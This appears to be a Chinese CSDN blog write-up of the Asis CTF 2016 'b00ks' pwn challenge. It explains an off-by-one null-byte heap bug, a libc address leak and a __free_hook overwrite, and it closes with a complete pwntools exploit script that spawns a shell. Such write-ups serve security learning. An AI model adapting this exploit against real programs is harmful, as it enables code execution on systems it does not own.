Asis CTF 2016 b00ks

最新推荐文章于 2023-10-02 12:42:32 发布
最新推荐文章于 2023-10-02 12:42:32 发布
阅读量314 收藏
点赞数
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44336971/article/details/111120892
版权

Asis CTF 2016 b00ks

在这里插入图片描述

结构体

通过前后分析可以得到如下结构

struct book
{
    int id;
    char *name;
    char *book_description;
    int size;
}

再来看一下漏洞

先看漏洞函数
在这里插入图片描述

可以看到*buf=0,这个将末尾置0,那么便存在off_by_one漏洞,但是之后我一直在各个函数里找漏洞,都没找到,最后在read_name()函数里找到的,这只能说我太菜了,不知道还有交叉引用这个东西直接按x啊

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pCWcoqGL-1607844293317)(C:\Users\18494\AppData\Roaming\Typora\typora-user-images\image-20201211161731432.png)]

可以看到只有四个函数调用了,那不就出来了吗?

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Ai8HHthV-1607844293319)(C:\Users\18494\AppData\Roaming\Typora\typora-user-images\image-20201211161326308.png)]

可以看到这里有个32,那么便可以肯定的是,漏洞,再点进去看一看

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ES1jetQD-1607844293320)(C:\Users\18494\AppData\Roaming\Typora\typora-user-images\image-20201211162057791.png)]

能够覆盖到0x38处

但是这个怎么着能不能覆盖?????到底是为什么呢?我弄了一下午,才发现。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VR1kZhvD-1607844293321)(C:\Users\18494\AppData\Roaming\Typora\typora-user-images\image-20201211184858219.png)]

左边是名字,右边是值。可以表明,这个是写死的了。

现在我们知道漏洞点了,那么现在怎么办呢?

  • 首先我们这里使用read_name函数读取(name,目的是泄露出其地址的内容)
  • 通过一字节溢出,会将第一个book的地址末尾置0,我们知道ASLR后1.5个字节也即3个16进制是不随机化的,所以我们后几位都是一定的
  • 当末尾置0的时候,他就会跳转到其前面的堆块中,这里会跳转到前面的book2_des地址去,然后我们通过构造得来伪造一个新的book
  • 在这个新的book中,我们将name,book_description地址变为book2的地址,这样我们便可以读取到book2的地址,而如果我们的book2申请空间很大的话,那么其可以通过mmap申请堆块,而这个堆块是与libc地址相关的,那么这样我们泄露出其地址,便是可以得到libc基地址
  • 由于这里有edit操作,那么我们便可以通过修改book1,来修改book2的地址指针,使其指向__free_hook然后我们便可以修改Book2的地址,便可以达到修改__free_hook的功能。

启用了FULL RELRO所以我们不能修改got表,但是我们可以修改__free_hook__malloc_hook,我们可以将它修改为one_gadget

结尾exp

#-*- coding:utf8 -*-
from pwn import *
context.os="linux"
context.arch="amd64"
context.word_size=64
context.endian="little"
context.log_level="debug"
local = True
pc="./b00ks"
remote_addr=["123.123.123.123",12345]
ru = lambda x : p.recvuntil(x)
sn = lambda x : p.send(x)
rl = lambda   : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
shell= lambda :p.interactive()
p=None
if local==True:
    p=process(pc)
    gdb.attach(p)
else:
    p=remote(remote_addr[0],remote_addr[1])

def create(size_1,name,size_2,description):
    p.recv()
    p.sendline("1")
    p.recvuntil("Enter book name size:")
    p.sendline(str(size_1))
    p.recvuntil("Enter book name (Max 32 chars):")
    p.sendline(name)
    p.recvuntil("Enter book description size:")
    p.sendline(str(size_2))
    p.recvuntil("Enter book description:")
    p.sendline(description)

def delete(id):
    p.recvuntil(">")
    p.sendline("2")
    p.recvuntil("Enter the book id you want to delete:")
    p.sendline(str(id))

def edit(id,description):
    p.recv()
    p.sendline("3")
    p.recvuntil("Enter the book id you want to edit:")
    p.sendline(str(id))
    p.recvuntil("Enter new book description:")
    p.sendline(description)

def read():
    p.recvuntil(">")
    p.sendline("4")

def change_name(name):
    p.recvuntil(">")
    p.sendline("5")
    p.recvuntil("Enter author name:")
    p.sendline(name)

def printbook(id):
    p.recvuntil("> ")
    p.sendline("4")
    p.recvuntil(": ")
    for i in range(id):
        book_id = int(p.recvline()[:-1])
        p.recvuntil(": ")
        book_name = p.recvline()[:-1]
        p.recvuntil(": ")
        book_des = p.recvline()[:-1]
        p.recvuntil(": ")
        book_author = p.recvline()[:-1]
    return book_id, book_name, book_des, book_author

if __name__ == "__main__":
    p.recvuntil("author name:")
    p.sendline("A"*32)
    create(48, '1a', 240, '1b') #1
    create(0x21000, '2a', 0x21000, '2b')#2
    book_id_1, book_name, book_des, book_author = printbook(1)
    first_heap = u64(book_author[32:32+6].ljust(8,'\x00'))
    log.info(hex(first_heap))
    payload =  "a"*0x50 + p64(1) + p64(first_heap + 0x38)     
    payload = payload + p64(first_heap + 0x40) + p64(0xffff)                                                                                                                                                                                                    
    edit(1,payload)
    change_name("A"*32)
    book_id_1, book_name, book_des, book_author = printbook(1)
    
    book2_name_addr = u64(book_name.ljust(8,'\x00'))
    book2_des_addr = u64(book_des.ljust(8, '\x00'))
    log.info(hex(book2_name_addr))
    log.info(hex(book2_des_addr))

    offset = 0x4f3d5
    offset = 0x4f432
    #offset = 0x10a41c
    

    libc_base = book2_des_addr - 0x5b8010
    one_gadget = libc_base +offset
    free_hook = libc_base +0x3ed8e8
    log.info(hex(libc_base))
    execv_addr =libc_base+ 0xe4c00
    system_addr = libc_base + 0x4f550
    bin_sh = 0x01b3e1a + libc_base
    #pause() 
    payload =  p64(free_hook)
    edit(1,payload)
    edit(2,p64(one_gadget))
    delete(2)
    #pause() 
    p.interactive()
兔崽子飞飞飞
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF竞赛权威指南(Pwn篇) 相关资源(python).zip
01-16
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。...CTF竞赛权威指南(Pwn篇) 相关资源(python).zip
[Asis CTF 2016] b00ks —— Off-By-One笔记与思考
Tokameine的博客
09-13 1297
前言: 这道题做得有点痛苦......因为本地通常都很难和服务器有相同的环境,使用mmap开辟空间造成的偏移会因此而变得麻烦,并且free_hook周围很难伪造chunk,一度显然恐慌...... 不过本来应该很早就开始Off-By-One的学习的,竟然现在才注意到......惭愧 正文: book结构: struct book { int id; char *name; char *description; in...
Asis CTF 2016 b00ks(堆溢出NULL byte off-by-one)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-21 1420
Asis CTF 2016 b00ks1.题目获取2.查保护3.分析程序4.地址泄露泄露地址修改地址5.伪造结构体 1.题目获取 题目下载地址:点此下载 2.查保护 3.分析程序 IDA载入,查看main函数 这个函数读取一个名字,最长32个字节。 作者名被读到data段 sub_A89()打印程序功能,并获取用户输入的序号 sub_F55()的功能是添加书籍信息,在这个函数中可以分析到...
[Asis CTF 2016] b00ks
ethan18的博客
08-01 185
这道题主要是用到了Off-By-One漏洞,还有利用mmap成立的堆与libc基址间距相等的原理。
asis2完整版
03-21
asis2完整版】指的是Apache Axis2的完整版本,它是一个高效的、可扩展的Web服务(Web Service)引擎。Apache Axis2是Axis1的下一代产品,专注于提供高性能、灵活且模块化的Web服务解决方案。 Web服务是一种通过...
ASIS for GNAT-开源
05-15
ASIS 本身是 ISO / IEC 15291:1999 国际标准,确保了不同实现之间的兼容性,使得开发者可以编写一次工具,然后在遵循 ASIS 标准的不同 Ada 编译器上运行。这一标准的制定,极大地促进了 Ada 开发环境的生态系统发展...
ASIS Certified Protection Professional(ASIS-CPP)认证考试题库.docx
07-05
ASIS Certified Protection Professional(ASIS-CPP)认证考试题库
ctf-writeups:CTF撰写
05-17
准备Docker容器为了毫无问题地运行挑战POC,我为各种Ubuntu版本准备了docker容器。 有关使用容器的说明,请参见。...32 NX Partial RELRO ASLR ret2libc stack overflow CTFtime Writeups档案ASIS
Off-By-One Asis CTF 2016 b00ks
qq_39153421的博客
03-09 471
Off-By-One学习、练习0x1、Off-By-One原理0x2、Asis CTF 2016 b00ks1、利用流程:2、泄露过程a、输入用户名,泄露book1地址b、构造假的fake_book结构体,使其指向book2的name和description字段。c、修改book1的描述字段,填入fake_book,输出book,得到book2的name和description地址。d、根据book2的name字段(为什么要是这个字段呢?)由固定偏移计算libcbasee、根据libcbase得到syste
Asis CTF 2016——b00ks
04-18 361
这程序是一个图书管理系统  #off-by-one 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 struct _IO_FILE *v3; // rdi 4 __int64 savedregs; // [rsp+20h] [rbp+0h] 5 6 ...
off by one --- Asis CTF 2016 b00ks题解
coco的博客
11-18 569
确定漏洞点 首先,checksec查看开了哪些保护,其中PIE会使我们的调试难度稍稍增加。 再执行程序之后是一个经典的菜单选择,可以大概判断是与堆的利用有关。 通过用ida反编译之后查看,发现有一个关于读的函数会多读入一个\x00,造成了一个null off by one的漏洞。 程序分析 create 函数 创建了book name的堆 创建了book description的堆 创建了b...
OFF BY ONE AsisCTF2016b00ks
Grxer的博客
03-20 105
题目链接:https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/off_by_one/Asis_2016_b00ksmore有漏洞会多读取一个字节的/x00author name存放在unk_202040+pie处,32个字节分析后可以推断出book结构体是如下的,而且在unk_202060+pie处开始存放结构体指针,我们可以进行一个字节的溢出,来控制book1的最低位地址。
asis2016_b00ks
z1r0的博客
03-21 555
asis2016_b00ks 查看保护 这个看上去很正常,跟进一下read_input 可以看到一个off-by-null漏洞。 这里的作者的名字和heap_ptr贴在了一起 攻击思路:一个off-by-null,看一下可不可以从author_addr这里入手 因为heap_ptr和author_addr贴在了一起,而read_input有一个off-by-null,可以通过change_author_name来使得heap_ptr低一字节被改在\x00。这里还有一个知识点,一开始输入0x20个数
asis2016_b00ks --堆的off-by-null
kissyunlei的博客
02-17 563
非常典型的off-by-null题,思路清晰,结构体指向难找,欢迎师傅们来看
[PWN] BUUCTF asis2016_b00ks Offbynull利用
LDX的博客
10-02 162
堆 Offbyone 劫持free_hook
堆中的off-by-one :ASIS CTF 2016:b00ks
qq_36918532的博客
01-12 2424
ASIS CTF 2016:b00ks 最近在练习pwn题,主要看的是ctf竞赛权威指南这本书,感觉这个题太巧妙了,记录一下 首先拿到文件第一步查看检查: 然后拿到IDA里面看: 在sub_b6d()函数中使用了一个自己写的read函数(这个函数存在一个off-by-one漏洞) 并且可以看到这里name存在off_202018 分析知道0ff_202010存的是book结构体 二者相差20个偏移 打印就是规中规矩的了,然后看修改作者姓名的,发现仍然是sub_b6d函数,但是在修改的时候就只能溢出一
ASIS+Quals
最新发布
10-18
ASIS是Ada语义接口规范,它是已发布的国际ISO标准(ISO / IEC 15291:1999)。它提供了一种机制,使得可以在Ada程序中访问和操作程序的语法和语义信息。ASIS可以用于许多应用程序,例如代码分析、代码转换、代码生成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值